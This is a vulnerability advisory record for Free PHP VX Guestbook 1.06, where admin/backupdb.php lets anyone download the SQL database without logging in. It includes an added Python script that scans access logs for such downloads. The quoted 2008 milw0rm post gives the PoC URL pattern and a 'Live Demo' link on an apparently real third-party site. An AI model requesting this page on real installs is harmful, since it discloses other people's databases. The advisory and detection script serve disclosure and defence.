Vendor: Free PHP VX Guestbook
By: SirGod
CVSS: 7.5 (HIGH)
Arbitrary Backup Database
CWE: 264
Product Name: Free PHP VX Guestbook
Affected Version From: 01.06
Affected Version To: 01.06
Patch Exists: NO
Related CWE: N/A
CPE: a:phpvx:free_php_vx_guestbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Free PHP VX Guestbook 1.06 Arbitrary Backup Database

An attacker can download the database of the vulnerable application by requesting the backupdb.php page, which is accessible without authentication.

Mitigation:

Authentication should be implemented for the backupdb.php page.
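
Because no patch exists, operators of an affected install may also want to know whether the backup page has already been fetched. The following is an added example, not part of the original advisory or the product's code: it scans web server access logs for successful requests to admin/backupdb.php. It assumes the Apache/Nginx combined log format and a hypothetical allowlist of administrator IP addresses; the sample log lines are constructed.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def is_backup_request(target):
    """True if the request path resolves to .../admin/backupdb.php."""
    path = unquote(target.split("?", 1)[0])   # drop query string, decode %xx
    path = posixpath.normpath(path).lower()   # collapse //, ./, ../; ignore case
    return path.endswith("/admin/backupdb.php")

def find_backup_downloads(lines, admin_ips=frozenset()):
    """Map client IP -> [(timestamp, bytes_sent)] for successful backup fetches
    from addresses outside the admin allowlist (the allowlist is an assumption)."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["status"] != "200" or m["ip"] in admin_ips:
            continue
        if is_backup_request(m["target"]):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], size))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Sep/2008:10:01:02 +0000] "GET /book/admin/backupdb.php HTTP/1.1" 200 48213 "-" "-"',
    '203.0.113.7 - - [13/Sep/2008:10:01:09 +0000] "GET /book/admin//%62ackupdb.php?x=1 HTTP/1.1" 200 48213 "-" "-"',
    '198.51.100.20 - - [13/Sep/2008:10:02:00 +0000] "GET /book/admin/backupdb.php HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.20 - - [13/Sep/2008:10:02:05 +0000] "GET /book/index.php?p=admin/backupdb.php HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [13/Sep/2008:10:03:00 +0000] "GET /book/admin/backupdb.php HTTP/1.1" 200 48213 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in find_backup_downloads(SAMPLE_LOG, {"192.0.2.10"}).items():
        for ts, size in events:
            print(f"{ip} fetched backupdb.php at {ts} ({size} bytes)")
```

A hit with a response size close to the size of the SQL dump means the database contents should be treated as disclosed.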

Exploit-DB raw data:

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod 
[+] wWw.MorTal-TeaM.OrG                   
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
################################################################################################

 [+] Arbitrary Backup Database

  Follow the example and the database download will begin :

   [dbname]_db_backup.sql

 
  PoC :

    http://[target]/[path]/admin/backupdb.php

  Example :

    http://127.0.0.1/book/admin/backupdb.php

  Live Demo :

    http://phpversion.com/book/admin/backupdb.php


################################################################################################

# milw0rm.com [2008-09-13]